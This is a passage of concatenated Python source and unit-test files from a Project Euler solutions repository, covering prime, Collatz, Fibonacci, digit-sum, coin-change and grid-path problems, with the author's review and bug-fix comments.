        if not is_prime_quick(expr(n, ab)):
            return n
    return 0  # unreachable: the while True above always returns


# The four +/- sign combinations applied to a coefficient pair (a, b).
signs = np.array([(-1, 1), (1, -1), (-1, -1), (1, 1)])


def sign_combos(coeff):
    """Return the best (prime_run_length, (a, b)) over all sign variants of coeff."""
    return max([(consecutive_primes(ab), tuple(ab)) for ab in (signs * coeff)])
cgnik/euler
src/py/problem35.py
# Project Euler 35: a circular prime stays prime under every rotation of its
# digits (197, 971, 719). How many circular primes are there below one million?
# https://projecteuler.net/problem=35
from util.primerator import is_prime_quick as is_prime


def digits(num):
    """Yield the decimal digits of num, least significant first (0 yields 0)."""
    if num == 0:
        yield 0
    n = num
    while n > 0:
        yield n % 10
        n = int(n / 10)


def is_circular_prime(x):
    """Return True if every rotation of x's decimal digits is prime."""
    s = list(str(x))
    for r in range(0, len(str(x))):
        g = s[r:] + s[0:r]  # rotate left by r positions
        if not is_prime(int(''.join([str(pp) for pp in g]))):
            return False
    return True


def circular_primes(limit):
    """Yield the circular primes below limit (2 special-cased, then odds only).

    NOTE(review): the odd scan starts at 1, so this relies on is_prime(1)
    returning False — confirm against util.primerator.
    """
    if limit > 2:
        yield 2
    for x in range(1, limit, 2):
        print(f"\rTesting {x:07d}", end='', flush=True)
        if is_circular_prime(x):
            print(f"\r \u2713 {x:07d}", flush=True)
            yield x
    print('\nDone.')


def init_test():
    """Sanity-check the generator against the known circular primes below 200."""
    expected = {2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, 97, 113, 131, 197, 199}
    actual = set(list(circular_primes(200)))
    assert expected.intersection(
        actual) == expected, f"Test failed to generate expected results: \nexpect: {expected}\nactual: {actual}"


def problem35():
    init_test()
    cyclics = list(circular_primes(10 ** 6))
    print(f"answer: {len(cyclics)}, cyclics: {cyclics}")


problem35()
cgnik/euler
src/py/problem19.py
# Project Euler 19: how many Sundays fell on the first of the month during
# the twentieth century (1 Jan 1901 to 31 Dec 2000)?
month_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
month_days_leap = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
days = ['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat']
months = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']


def problem19():
    """Count first-of-month Sundays 1901-2000 by tracking a weekday offset.

    Year 0 here is 1900 (a known Monday, hence the initial offset of 1);
    matches are only recorded for year > 0, i.e. 1901 onwards.
    """
    matches = []
    offset = 1
    for year in range(0, 101):
        # NOTE(review): plain mod-4 leap rule; the century exception (1900
        # not leap) is only avoided because year 0 never records matches —
        # but 1900's day count still feeds the running offset. Confirm the
        # final count; the known answer to this problem is 171.
        if year > 0 and year % 4 == 0:
            md = month_days_leap
        else:
            md = month_days
        for m in range(0, 12):
            if m == 6 and year == 0:
                # Debug trace for July 1900 left in by the author.
                print(f"{months[m]} :: {md[:m]} :: {sum(md[:m])} :: {sum(md[:m]) + offset} :: {(sum(md[:m]) + offset) % 7}")
            # (days since year start + offset) % 7 == 0 means the 1st is a Sunday.
            if (sum(md[:m]) + offset) % 7 == 0 and year > 0:
                matches.append((1900 + year, months[m]))
        offset = (sum(md) + offset) % 7
    for match in matches:
        print(f"match: {match}")
    print(f"Problem 19 answer: {len(matches)}")


# if year starts on a monday, then begin_offset = 6
# for each month, sum of first_of_year_offset + sum(month_dayx[0:month_index]) = offset for next first-of-month
# mon, jan 1, 1900 (not leap, first_of_year_offset = 6)
# sun, jan 7, 14, 21, 28, 1900 (first sundays)
# thu, feb 1, 1900 (first of second month)
# thu, mar 1, 1900 (first of third month)
# sun, apr 1, 1900 (first of fourth month)
# (31 - 6) % 7 = 4
# (count_month_days - year_offset) % days_in_week
problem19()
cgnik/euler
src/py/util/test_cartesian.py
from unittest import TestCase

import numpy as np

from util.cartesian import cartesian


class Test_cartesian(TestCase):
    """Unit tests for util.cartesian.cartesian (bounded product closure)."""

    def test_cartesian(self):
        def lte(limit):
            # Boundary-predicate factory: keep products <= limit.
            def test(x):
                return x <= limit
            return test

        self.assertListEqual(listify(cartesian(lte(2), [1])), [1])
        self.assertListEqual(listify(cartesian(lte(16), [1, 2])), [1, 2, 4, 8, 16])
        self.assertListEqual(listify(cartesian(lte(81), [1, 3])), [1, 3, 9, 27, 81])
        self.assertListEqual(listify(cartesian(lte(81), [1, 2, 3])),
                             [1, 2, 3, 4, 6, 8, 9, 12, 16, 18, 24, 27, 32, 36, 48, 54, 64, 72, 81])
        self.assertListEqual(listify(cartesian(lte(1), [1, 2, 3])), [1])
        self.assertListEqual(listify(cartesian(lte(2), [1, 2, 3])), [1, 2])
        self.assertListEqual(listify(cartesian(lte(24), [1, 2, 3])),
                             [1, 2, 3, 4, 6, 8, 9, 12, 16, 18, 24])


def listify(gen):
    # Sort the unique values so the assertions are order-independent.
    x = list(np.unique(np.array([f for f in gen])))
    x.sort()
    return x
cgnik/euler
src/py/util/test_nth.py
from unittest import TestCase

from util.nth import nth


class Test_nth(TestCase):
    """Unit tests for util.nth.nth over both sequences and generators."""

    def test_nth(self):
        self.assertEqual(1, nth(3, [0, 2, 1]))
        # Per this fixture an out-of-range/negative index is expected to yield 0.
        self.assertEqual(0, nth(-33, [0, 2, 1]))

        def test_gen(max):
            # NOTE: `max` shadows the builtin; harmless in this local helper.
            for i in range(0, max):
                yield i

        self.assertEqual(2, nth(3, test_gen(4)))
        self.assertEqual(2, nth(3, test_gen(8)))
cgnik/euler
src/py/problem29.py
# Project Euler 29: how many distinct terms does a**b generate for
# 2 <= a <= 100 and 2 <= b <= 100? (For 2 <= a, b <= 5 there are 15.)
from util.distinct_powers import distinct_powers


def problem29():
    """Count the distinct values of a**b over 2..100 x 2..100 and report it."""
    term_count = distinct_powers(2, 100)
    print(f"Problem 29: {term_count}")


problem29()
cgnik/euler
src/py/util/test_spiral.py
from unittest import TestCase

from util.spiral import spiral_diagonals


class Test_spiral(TestCase):
    """Unit tests for util.spiral.spiral_diagonals.

    A width-n clockwise number spiral has 2n - 1 diagonal values
    (the centre 1 is shared by both diagonals).
    """

    def test_spiral_diagonals(self):
        self.assertListEqual(spiral_diagonals(3), [1, 3, 5, 7, 9])
        self.assertListEqual(spiral_diagonals(5), [1, 3, 5, 7, 9, 13, 17, 21, 25])
        self.assertListEqual(spiral_diagonals(11),
                             [1, 3, 5, 7, 9, 13, 17, 21, 25, 31, 37, 43, 49, 57, 65, 73, 81, 91, 101, 111, 121])
cgnik/euler
src/py/problem20.py
from functools import reduce


def problem20():
    """Project Euler 20: sum of the digits of 100!.

    Returns:
        int: the digit sum (also printed), so callers/tests can verify it.
    """
    fac = reduce(lambda x, accum: x * accum, range(1, 101))
    # str(fac) is already iterable by character; the original wrapped it in a
    # redundant list(). Summing the int digits gives the answer (648).
    digit_sum = sum(map(int, str(fac)))
    print(f"fac: {digit_sum}")
    return digit_sum


problem20()
cgnik/euler
src/py/util/test_quadratic_primes.py
from unittest import TestCase

from util.quadratic_primes import consecutive_primes, expr, sign_combos


class Test_quadratic_primes(TestCase):
    """Unit tests for util.quadratic_primes."""

    def test_consecutive_primes(self):
        # Fixed typo in the method name ("consecurive"); still discovered by
        # unittest via the test_ prefix, so no runner behavior changes.
        # n^2 + n + 41 is prime for n = 1..39 and composite at n = 40.
        self.assertEqual(40, consecutive_primes((1, 41)))
        # n^2 - 79n + 1601 is prime for n = 1..79.
        self.assertEqual(80, consecutive_primes((-79, 1601)))

    def test_expr(self):
        # expr(40, (1, 41)) = 1600 + 40 + 41 = 1681 = 41^2.
        self.assertEqual(1681, expr(40, (1, 41)))

    def test_sign_combos(self):
        # Best sign variant of (1, 41) is (-1, 41): primes for n = 1..40.
        self.assertEqual(41, sign_combos((1, 41))[0])
cgnik/euler
src/py/problem28.py
# Project Euler 28: sum of the numbers on the diagonals of a 1001x1001
# spiral built clockwise from 1 at the centre. For the 5x5 example
# (21..25 / 20 7 8 9 10 / 19 6 1 2 11 / 18 5 4 3 12 / 17 16 15 14 13)
# the diagonal sum is 101.
from util.spiral import spiral_diagonals


def problem28():
    values = spiral_diagonals(1001)
    # Expect 2n - 1 = 2001 diagonal entries for width 1001 (the centre is
    # shared by both diagonals), matching the 5x5 example's 9 entries.
    print(f"values: {', '.join([str(v) for v in values])}")
    print(f"Problem 28: sum: {sum(values)}, count: #{len(values)}")


problem28()
cgnik/euler
src/py/problem3.py
from util.factoring import factors

if __name__ == '__main__':
    # Project Euler 3: factor 600851475143 (largest prime factor wanted).
    num = 600851475143
    fs = list(factors(num))
    # Bug fix: the original line was
    #   fs.append([x for f in x for x in factors(f)])
    # which raises NameError (`x` is undefined when `for f in x` is evaluated)
    # and would have appended a nested list rather than individual factors.
    # Intended behavior: also collect the factors of each factor, flattened.
    fs.extend(x for f in list(fs) for x in factors(f))
    print(f"{fs}")
cgnik/euler
src/py/util/digit_exponents.py
def is_power_sum(n, exponent):
    """Return True if n equals the sum of its digits each raised to exponent."""
    return sum(int(digit) ** exponent for digit in str(n)) == n


def power_sums(exponent, limit=10000):
    """Yield every n in [2, limit] equal to its digit-power sum.

    Prints a carriage-return progress percentage while scanning.
    n = 1 is excluded by the Project Euler 30/34 convention (1 = 1^k is
    not a sum). Bug fix: the original incremented n before testing, so it
    scanned 2..limit+1 — one value past the requested bound.
    """
    percent_complete = 0
    for n in range(2, limit + 1):
        percent = int((n / limit) * 100)
        if percent > percent_complete:
            percent_complete = percent
            print(f"\r{percent_complete}% complete...", flush=True, end='')
        if is_power_sum(n, exponent):
            yield n
    print("\r100% complete.")
cgnik/euler
src/py/problem25.py
# Project Euler 25: the Fibonacci sequence F(n) = F(n-1) + F(n-2) with
# F(1) = F(2) = 1. F(12) = 144 is the first term with three digits.
# What is the index of the first term to contain 1000 digits?
from util.fibonacci import fibonacci


def get_first_fibonacci():
    """Return the 1-based index of the first Fibonacci number with 1000 digits."""
    # A number has 1000 digits iff it is >= 10**999. Bug fix: the original
    # used 10**999 - 1, which is itself a 999-digit number and would have
    # wrongly matched any Fibonacci term equal to it.
    min_size = 10 ** 999
    count = 1
    print(f"length of min: {len(str(min_size))}")
    for f in fibonacci():
        if f >= min_size:
            return count
        count += 1


def problem24():
    # NOTE(review): this is problem 25; the function keeps its original
    # (misnamed) identifier so any existing callers are unaffected.
    print(f"Problem 25: index of first fibonacci > 10^1000: {get_first_fibonacci()}")


problem24()
cgnik/euler
src/py/util/matrix.py
import numpy as np


def flipdiag(x, dim):
    """Copy each diagonal of x into a row of a dim x dim zero matrix.

    Row selection uses the diagonal offset directly, so negative offsets
    land in rows counted from the end (Python negative indexing); each
    diagonal is left-aligned and the remainder of the row stays zero.
    NOTE(review): offsets i and i - dim address the same row; in practice
    the longer diagonal is written last for i >= 0 — confirm callers rely
    only on the non-negative offsets.
    """
    a = np.zeros((dim, dim))
    for i in range(-1 * dim, dim):
        hd = x.diagonal(offset=i)
        a[i][0:len(hd)] = hd
    return a


def groups(x, size, start=0):
    """Stack every width-`size` horizontal window of x (columns start..end).

    Returns the windows vertically concatenated via np.vstack.
    """
    return np.vstack([x[:, n:n + size] for n in range(start, x.shape[0] - size + 1) if len(x[n]) >= size])
cgnik/euler
src/py/problem16.py
from functools import reduce  # kept: other importers of this module may rely on it


def problem16():
    """Project Euler 16: sum of the digits of 2**1000.

    Returns:
        int: the digit sum (also printed) so tests can verify it.
    """
    # Builtin sum over a generator replaces the original reduce(lambda ...)
    # over a materialized list — same result (1366), clearer intent.
    digit_sum = sum(int(digit) for digit in str(2 ** 1000))
    print(f"Problem 16 {digit_sum}")
    return digit_sum


problem16()
cgnik/euler
src/py/util/test_any_divisors.py
from unittest import TestCase

from util.divisible import divisible_by


class Test_divisible_by(TestCase):
    """Unit tests for util.divisible.divisible_by(n, divisors)."""

    def test_any_divisors(self):
        # None and an empty list are treated as "divisible by nothing".
        self.assertFalse(divisible_by(12, None))
        self.assertFalse(divisible_by(12, []))
        # True as soon as any listed divisor divides n evenly.
        self.assertTrue(divisible_by(12, [5, 6, 2]))
        self.assertTrue(divisible_by(8, [2]))
        self.assertTrue(divisible_by(9, [3]))
        self.assertFalse(divisible_by(5, [2, 3]))
        self.assertFalse(divisible_by(22, [10, 45, 7]))
        self.assertTrue(divisible_by(22, [10, 45, 11]))
        self.assertTrue(divisible_by(63, [88, 2, 3]))
        self.assertFalse(divisible_by(63, [88, 2, 5]))
cgnik/euler
src/py/problem21.py
from util.factoring import all_factors # https://projecteuler.net/problem=21 # Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n). # If d(a) = b and d(b) = a, where a โ‰  b, then a and b are an amicable pair and each of a and b are called amicable numbers. # # For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220. # # Evaluate the sum of all the amicable numbers under 10000. def problem21(): all = {} for i in range(1, 10000): if i % 100 == 0: print('.', end='', flush=True) all[i] = sum(all_factors(i)) answer = [] print(f"\n{all}\nsumming...") for k, v in all.items(): if v in all and k in all and v != k and v == all[k] and k == all[v]: answer.append(((k, all[k]), (v, all[v]))) amicables = [a[0][0] for a in answer] print(f"Answer ({len(answer)}): {sum(amicables)}, {amicables}") problem21()
cgnik/euler
src/py/util/palindrome.py
def is_palindrome(x):
    """Return True if the decimal representation of x reads the same reversed."""
    s = str(x)
    return s == s[::-1]


def find_palindromes():
    """Return (product, i, j) for every palindromic product of two 3-digit numbers.

    Bug fix: the original loops used range(100, 999), silently excluding the
    factor 999 from both positions; range(100, 1000) covers all 3-digit numbers.
    """
    found = []
    for i in range(100, 1000):
        for j in range(100, 1000):
            if is_palindrome(i * j):
                found.append((i * j, i, j))
    return found
cgnik/euler
src/py/problem14.py
from util.collatz import collatz_series


def longest_collatz_between(start, end):
    """Return (n, series, length) for the n in [start, end) whose Collatz
    series is longest. Prints a progress dot every 1000 candidates."""
    answer = (0, [], 0)
    for i in range(start, end):
        if i % 1000 == 0:
            print('.', end='', flush=True)
        x = list(collatz_series(i))
        if len(x) > answer[2]:
            answer = (i, x, len(x))
    return answer


def problem14():
    """Project Euler 14: longest Collatz chain for a starting number < 10^6."""
    answer = longest_collatz_between(13, 10 ** 6)
    print(f"Answer: {answer}")


problem14()
cgnik/euler
src/py/util/fibonacci.py
def fibonacci():
    """Yield the Fibonacci numbers 1, 1, 2, 3, 5, 8, ... without bound."""
    previous, current = 0, 1
    while True:
        yield current
        previous, current = current, previous + current
cgnik/euler
src/py/util/test_grids.py
from unittest import TestCase

import numpy as np

from util.grids import gen_paths, get_sticks


class Test_grids(TestCase):
    """Unit tests for util.grids edge ("stick") and path enumeration."""

    test_data1 = []
    test_data2 = [[1, 2], [3, 4]]
    test_data3 = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]

    def test_get_sticks(self):
        self.assertCountEqual(get_sticks(np.array(self.test_data1)), [])
        self.assertCountEqual(get_sticks(np.array(self.test_data2)), [(1, 2), (1, 3), (2, 4), (3, 4)])
        self.assertCountEqual(get_sticks(np.array(self.test_data3)),
                              [(1, 2), (1, 4), (2, 5), (2, 3), (3, 6), (4, 5), (4, 7), (5, 6), (5, 8),
                               (6, 9), (7, 8), (8, 9)])

    def test_20_sticks(self):
        # An n x n grid always has 2(n^2) - 2n edges.
        # NOTE(review): smoke test only — no assertion is made on len(x);
        # consider asserting len(x) == 2 * n * n - 2 * n.
        def sickerize(n):
            arr = np.arange(n ** 2).reshape((n, n))
            x = get_sticks(arr)

        for n in [2, 3, 6, 7, 8, 9, 20]:
            sickerize(n)

    def test_gen_paths_sanity(self):
        # None and an empty grid both yield no paths.
        self.assertListEqual(gen_paths(None), [])
        self.assertListEqual(gen_paths(self.test_data1), [])

    def test_gen_paths_basic(self):
        self.assertListEqual(gen_paths(self.test_data2), [(1, 2, 4), (1, 3, 4)])

    def test_gen_paths_complex(self):
        self.assertListEqual(gen_paths(self.test_data3), [
            (1, 2, 3, 6, 9),
            (1, 2, 5, 6, 9),
            (1, 2, 5, 8, 9),
            (1, 4, 5, 6, 9),
            (1, 4, 5, 8, 9),
            (1, 4, 7, 8, 9),
        ])
cgnik/euler
src/py/util/cartesian.py
import itertools as it
from operator import mul

import numpy as np
from functools import reduce

from util.factoring import factors


def cartesian(boundary, x, *args, reducer=mul):
    """Close x under pairwise combination with `reducer`, bounded by `boundary`.

    With extra iterables in *args, x is combined once against each of them.
    Without args, x is combined against the running product set repeatedly
    until the (filtered, sorted, deduplicated) result reaches a fixed point.
    Returns the surviving values as a numpy array.
    """
    products = x
    last_products = []

    def gen():
        # Yields the sequence of "right-hand" operands: the args once each,
        # or the evolving product set forever (fixed-point mode).
        yield x
        if args and len(args):
            for z in args:
                yield z
        else:
            while True:
                yield products
        return None  # unreachable: the while True above never exits

    for products in gen():
        # NOTE: the comprehension variable deliberately shadows the outer x.
        products = np.unique([reduce(reducer, x) for x in it.product(x, products)])
        products = list(filter(boundary, products))
        products.sort()
        if products == last_products:
            break  # fixed point reached — no new values survived the boundary
        last_products = products
    return np.array(products)


def cartesian_factors(n, facs):
    """Return (facs, divisors): the closure of facs under multiplication,
    restricted to exact divisors of n."""
    cart = cartesian(lambda x: n % x == 0, facs)
    return facs, cart[np.where(n % cart == 0)]


def cartesian_product(nums, limit=None):
    """All pairwise products of nums; if limit is given, keep only its divisors."""
    product_pairs = it.product(np.array(nums), np.array(nums))
    products = [a[0] * a[1] for a in product_pairs]
    if limit is not None:
        divisors = list(filter(lambda x: limit % x == 0, products))
    else:
        divisors = products
    return divisors


def cartesian_loop(n, count):
    """Iterate `count` rounds of divisor-restricted pair products of n's factors."""
    facs = list(factors(n))
    for c in range(0, count):
        facs = list(set(cartesian_product(facs, n)))
    return facs


def all_factors(num, include_self=False):
    """Return the divisors of num found by repeated product closure.

    NOTE(review): 8 closure rounds is assumed to cover the prime-factor
    multiplicity of the inputs used in this project — confirm for numbers
    with more than 2^8-style factor depth.
    """
    answer = cartesian_loop(num, 8)
    if not include_self:
        answer.remove(num)
    return answer
cgnik/euler
src/py/util/distinct_powers.py
import itertools as it

import numpy as np

# Map each perfect power <= 100 to one (base, exponent) decomposition, used to
# canonicalise a**b terms. Duplicate keys (e.g. 16 = 4^2 = 2^4) keep the
# last-written decomposition.
# NEED TO DEDUPE/SIMPLIFY_POWERS ON THE POWS LIST BEFORE USING IT. CHICKENEGG.
pows = {a ** b: (a, b) for b in range(2, 10) for a in range(2, 11) if a ** b <= 100}


def distinct_powers(l, h):
    """Count distinct values of a**b for l <= a, b <= h.

    Each (a, b) pair is reduced to a canonical (root, exponent) form so that
    e.g. 4**2 and 2**4 collapse to the same set element.
    """
    values = np.arange(l, h + 1)
    terms = {simplify_exponent(*p) for p in it.product(values, values)}
    return len(terms)


def simplify_exponent(base, pow):
    """Rewrite base**pow using the smallest known root of base.

    If base == r**k (per `pows`), return (r, pow * k); otherwise (base, pow).
    NOTE(review): int(base ** (1 / k)) recovers the root via a float k-th
    root — exact for these small values, but confirm before widening ranges.
    NOTE: `pow` shadows the builtin; kept as-is (doc-only change).
    """
    multiplier = pows.get(base, (1, 1))
    return int(base ** (1 / multiplier[1])), pow * multiplier[1]
cgnik/euler
src/py/problem34.py
# Project Euler 34 (https://projecteuler.net/problem=34):
# 145 is curious: 1! + 4! + 5! = 1 + 24 + 120 = 145. Find the sum of all
# numbers equal to the sum of the factorials of their digits.
# Note: 1! = 1 and 2! = 2 are not sums and are excluded.
from math import factorial
from time import process_time

# Digit-factorial lookup tables; 0! == 1, so digit 0 contributes 1.
# Bug fix: `facs` previously mapped digit 0 to 0, disagreeing with `facs_s`
# (which correctly used 1) — facs_sum(40585) was wrong, for example.
facs = [factorial(x) for x in range(0, 10)]
facs_s = {str(x): factorial(x) for x in range(0, 10)}


def facs_sum_s(num):
    """Digit-factorial sum of num, via its string digits."""
    return sum(facs_s[c] for c in str(num))


def facs_sum(num):
    """Digit-factorial sum of num, via arithmetic digit extraction."""
    n = num
    s = 0
    while n > 0:
        s += facs[n % 10]
        n = int(n / 10)
    return s


def find_answers():
    """Yield every n >= 3 equal to its digit-factorial sum.

    Upper bound: 7 * 9! = 2,540,160 is the largest digit-factorial sum a
    7-digit number can reach; past that the number always exceeds the sum.
    """
    x = 3
    while x < 2540160:
        print(f"\rTesting {x:07d}", flush=True, end='')
        if facs_sum_s(x) == x:
            print(f"\r \u2713 {x:07d}", flush=True)
            yield x
        x = x + 1


def problem34():
    start = process_time()
    answers = []
    for a in find_answers():
        answers.append(a)
    print(f"\nProblem 34: {sum(answers)}, time: {process_time() - start}s answers: {answers}, facs: {facs}")
    # 40730


problem34()
cgnik/euler
src/py/problem30.py
# Project Euler 30: 1634, 8208 and 9474 are the only numbers equal to the sum
# of the fourth powers of their digits (their sum is 19316). Find the sum of
# all numbers that can be written as the sum of FIFTH powers of their digits.
from util.digit_exponents import power_sums


def problem30():
    """Sum every number equal to the sum of the fifth powers of its digits."""
    # Upper bound: a 6-digit number's digit-power sum is at most
    # 6 * 9**5 = 354,294, and every 7-digit number (>= 1,000,000) already
    # exceeds the 7-digit maximum sum of 413,343 — so no candidate can lie
    # above 6 * 9**5. The original scanned to 10**8, ~280x the needed work.
    limit = 6 * 9 ** 5
    print(f"calculating power sums with upper limit of {limit:,}")
    sums = list(power_sums(5, limit))
    print(f"Problem 30 found {len(sums)} sums of fifth powers {sums}")
    print(f"Problem 30: {sum(sums)}")


problem30()
cgnik/euler
src/py/problem4.py
from palindrome import find_palindromes


def first(x):
    """Sort key: the product component of a (product, i, j) triple."""
    return x[0]


def problem4():
    """Print the largest palindrome made from a product of two 3-digit numbers."""
    candidates = find_palindromes()
    candidates.sort(key=first, reverse=True)
    print(f"best: {candidates[0]}")


problem4()
cgnik/euler
src/py/problem18.py
# Project Euler 18: maximum top-to-bottom path sum in a number triangle.
# Two approaches: an exhaustive brute force and a greedy/heuristic climb.
from statistics import mean


def weight_down(d, row, column):
    """Heuristic weight for a cell: blend its value with the mean of a
    triangular window of cells below/right of it."""
    # NOTE: the comprehension variable deliberately shadows the parameter d.
    w = [d for i in range(0, len(d) - row) for d in d[i][column:column + i]]
    if len(w) == 0:
        return d[row][column]
    return int(mean([d[row][column], mean(w)]))


def weight_data_down(d):
    """Per-tier lists of (col, row, weight, value), sorted best-weight first."""
    weights = []
    for xindex, x in enumerate(d):
        weights.append([(yindex, xindex, weight_down(d, xindex, yindex), y) for yindex, y in enumerate(x)])
    for w in weights:
        w.sort(key=lambda x: x[2], reverse=True)
    return weights


def next_choices(c, last_index):
    """True if entry c (keyed by column) is reachable from column last_index."""
    return c[0] == last_index or c[0] == last_index + 1


def pathize(tiers, override={}):
    """Greedy downward walk choosing the heavier of the two reachable cells.

    `override` maps tier index -> forced choice index within that tier's
    sorted weight list. NOTE(review): mutable default argument — safe only
    while callers never mutate it.
    """
    weights = weight_data_down(tiers)
    indices = [weights[0][0]]
    for dindex in range(1, len(tiers)):
        if override.get(dindex):
            indices.append(weights[dindex][override[dindex]])
        else:
            a, b = list(filter(lambda c: next_choices(c, indices[-1][0]), weights[dindex]))
            indices.append(a if a[2] > b[2] else b)
    return indices


def from_index(grid, row_index, column_index):
    """Values in the next row reachable (upward-walk sense) from this cell."""
    nexts = []
    if row_index > len(grid):
        return nexts
    row = grid[row_index + 1]
    if column_index < len(row):
        nexts.append(row[column_index])
    if column_index > 0:
        nexts.append(row[column_index - 1])
    return nexts


def weight_up(grid, row_index, column_index):
    """Cell value plus the mean of its reachable successors (if any)."""
    weights = [grid[row_index][column_index]]
    next_weights = from_index(grid, row_index, column_index)
    if len(next_weights):
        weights.append(mean(next_weights))
    return sum(weights)


def next_index(grid, row_index, column_index):
    """Pick the column to move to in row row_index, clamped to the row edges;
    otherwise the heavier of column_index and column_index - 1."""
    ln = len(grid[row_index])
    if column_index == 0 or ln == 1:
        return 0
    elif column_index >= ln:
        return ln - 1
    elif weight_up(grid, row_index, column_index) < weight_up(grid, row_index, column_index - 1):
        return column_index - 1
    return column_index


def pathize_up(triangle):
    """Climb from every bottom cell to the apex, keeping the best path found.

    Returns the list of addends top-to-bottom for the best climb.
    """
    tiers = triangle.copy()
    tiers.reverse()
    max_path = [0]
    paths = []  # NOTE(review): unused
    for num_index, num in enumerate(tiers[0]):
        path = [(num_index, num)]
        for tier_index, tier in enumerate(tiers):
            if tier_index == 0:
                continue
            up_index = next_index(tiers, tier_index, path[-1][0])
            path.append((up_index, tier[up_index]))
            # print(f"path: {path}")
        addends = [x[1] for x in path]
        if sum(addends) > sum(max_path):
            max_path = addends
    max_path.reverse()
    return max_path


def problem18up(d):
    answer = pathize_up(d)
    print(f"Up-path answer: {sum(answer)} :: {answer}")


def elaborate(d, row, column):
    """Recursively enumerate every root-to-bottom path from (row, column)."""
    if row < len(d) - 1:
        paths = elaborate(d, row + 1, column) + elaborate(d, row + 1, column + 1)
        for p in paths:
            p.insert(0, d[row][column])
        return paths
    return [[d[row][column]]]


def problem18brute(d):
    """Exhaustive search — ground truth for the heuristic approaches.

    NOTE: `all` shadows the builtin; kept as-is (doc-only change).
    """
    all = [(sum(e), e) for e in elaborate(d, 0, 0)]
    best = max(all, key=lambda x: x[0])
    # answer: (1074, [75, 64, 82, 87, 82, 75, 73, 28, 83, 32, 91, 78, 58, 73, 93])
    print(f"Brute answer: {best}")


def problem18():
    # Parse the problem's 15-row triangle from the embedded text block.
    d = [list(map(lambda x: int(x), a.strip().split(' '))) for a in """75
95 64
17 47 82
18 35 87 10
20 04 82 47 65
19 01 23 75 03 34
88 02 77 73 07 63 67
99 65 04 28 06 16 70 92
41 41 26 56 83 40 80 70 33
41 48 72 33 47 32 37 16 94 29
53 71 44 65 25 43 91 52 97 51 14
70 11 33 28 77 73 17 78 39 68 17 57
91 71 52 38 17 14 91 43 58 50 27 29 48
63 66 04 68 89 53 67 30 73 16 69 87 40 31
04 62 98 27 23 09 70 98 73 93 38 53 60 04 23""".split("\n")]
    problem18brute(d)
    problem18up(d)


problem18()
cgnik/euler
src/py/util/collatz.py
def collatz(n):
    """Return the Collatz successor of n: n/2 when even, 3n + 1 when odd."""
    if n % 2:
        return (n * 3) + 1
    return int(n / 2)


def collatz_series(n):
    """Yield the Collatz sequence after n, ending with (and including) 1.

    collatz_series(1) yields nothing, since 1 is already the terminus.
    """
    current = n
    while current != 1:
        current = collatz(current)
        yield current
    return 1
cgnik/euler
src/py/util/abundant.py
from util.cartesian import all_factors


def abundant_numbers(up_to):
    """Return sorted abundant numbers (proper-divisor sum > n) in [12, up_to].

    12 is the smallest abundant number, hence the range start. Prints a
    carriage-return progress percentage every 100 candidates.
    """
    abundants = []
    for n in range(12, up_to + 1):
        if n % 100 == 0:
            print(f"\rcalculating abundants: {int(n * 100 / up_to)}%", end='', flush=True)
        if sum(all_factors(n)) > n:
            abundants.append(n)
    abundants = list(set(abundants))
    abundants.sort()
    print("")
    return abundants


def contains_sum_for(num, adders):
    """True if num is the sum of two (not necessarily distinct) adders values.

    Two-pointer scan over the sorted candidates below num; the doubled-value
    check up front handles the a + a == num case that the start < end guard
    would otherwise miss.
    """
    adders = list(filter(lambda x: x < num, adders))
    adders.sort()
    start = 0
    end = len(adders) - 1
    if num in list(map(lambda n: n * 2, adders)):
        return True
    while start < end:
        result = adders[start] + adders[end]
        if result == num:
            return True
        elif result > num:
            end -= 1
        else:
            start += 1
    return False


# Reference quadratic implementation, kept for comparison:
# def contains_sum_for(num, adders):
#     available = [a for a in adders if a < num]
#     for index, a in enumerate(available):
#         if (num - a) in available:
#             return True
#     return False
cgnik/euler
src/py/problem31.py
# Project Euler 31: how many different ways can ยฃ2 (200p) be made from the
# coins 1p, 2p, 5p, 10p, 20p, 50p, ยฃ1 (100p) and ยฃ2 (200p)?
# These counts are restricted partitions of the amount; no closed form of the
# partition function is known.
# https://en.wikipedia.org/wiki/Partition_(number_theory)


def make_change(amount, coins):
    """Count the ways to form `amount` from unlimited coins of `coins`.

    Classic bottom-up coin-change DP: processing one denomination at a time
    makes counts[i] the number of COMBINATIONS (order-insensitive) summing
    to i. Returns counts[amount].
    Fix: removed the leftover DEBUG print that dumped the whole DP table
    once per coin.
    """
    counts = [0] * (amount + 1)
    # Seed: exactly one way to make 0 — use no coins; p(0) == 1.
    counts[0] = 1
    for coin in coins:
        for i in range(coin, len(counts)):
            counts[i] = counts[i] + counts[i - coin]
    return counts[-1]


def change_largest_coin(coins):
    """Count the ways to make the largest denomination from the full set."""
    return make_change(max(coins), coins)


def problem31_american():
    print(f"Problem 31 American: {change_largest_coin([1, 5, 10, 25, 50, 100])}")


def problem31_english():
    print(f"Problem 31 English: {change_largest_coin([1, 2, 5, 10, 20, 50, 100, 200])}")


def problem31():
    print(f"Problem 31 test: 12: {make_change(12, [1, 2, 5])}")
    print(f"Problem 31 test: 10: {change_largest_coin([1, 5, 10])}")
    problem31_american()
    problem31_english()


problem31()
cgnik/euler
src/py/util/primerator.py
from multiprocessing import Pool

from util.factoring import is_prime_quick


class Primerator:
    """Parallel prime finder: primality-tests odd candidates below a limit
    across a multiprocessing pool."""

    def __init__(self, limit):
        # Exclusive upper bound for the generated primes.
        self.limit = limit

    def _candidate_generator_(self):
        # Odd candidates only; 2 is appended separately in primes().
        for x in range(3, self.limit, 2):
            yield x

    def _one_thread_(self, candidate):
        """Pool worker: returns (candidate, is_prime) and prints a progress dot
        roughly every 100,000 candidates."""
        if candidate % 100000 == 1:
            print('.', end='', flush=True)
        return candidate, is_prime_quick(candidate)

    def _filter_primes_(self, candidates):
        # Keep only the (candidate, flag) pairs whose flag is truthy.
        return filter(lambda x: x[1], candidates)

    def primes(self, thread_count=8):
